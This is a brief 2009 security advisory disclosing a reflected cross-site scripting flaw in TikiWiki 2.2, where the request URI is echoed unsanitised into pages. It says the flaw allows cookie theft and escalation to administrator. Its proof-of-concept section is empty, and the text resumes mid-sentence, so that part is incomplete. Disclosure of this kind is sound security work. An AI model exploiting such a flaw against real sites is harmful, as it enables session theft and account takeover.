Version: 2.2 (latest)
Bug: Active XSS in URI
Date: 12 Mar 2009
Discovered by: iliz
Contact: e-mail: iliz-z(at)yandex(dot)ru
TikiWiki version 2.2 and later uses URI in html response body and fails to sanitize it. Is therefore prune to Active XSS attack.
PROOF OF CONCEPT:
browser, this can be exploited to steal cookies and escalate
privileges to administrator.
Tested with TikiWiki 2.2, Apache 2.2, Mozilla Firefox 3.0.6, InternetExplorer 7, Opera 9.65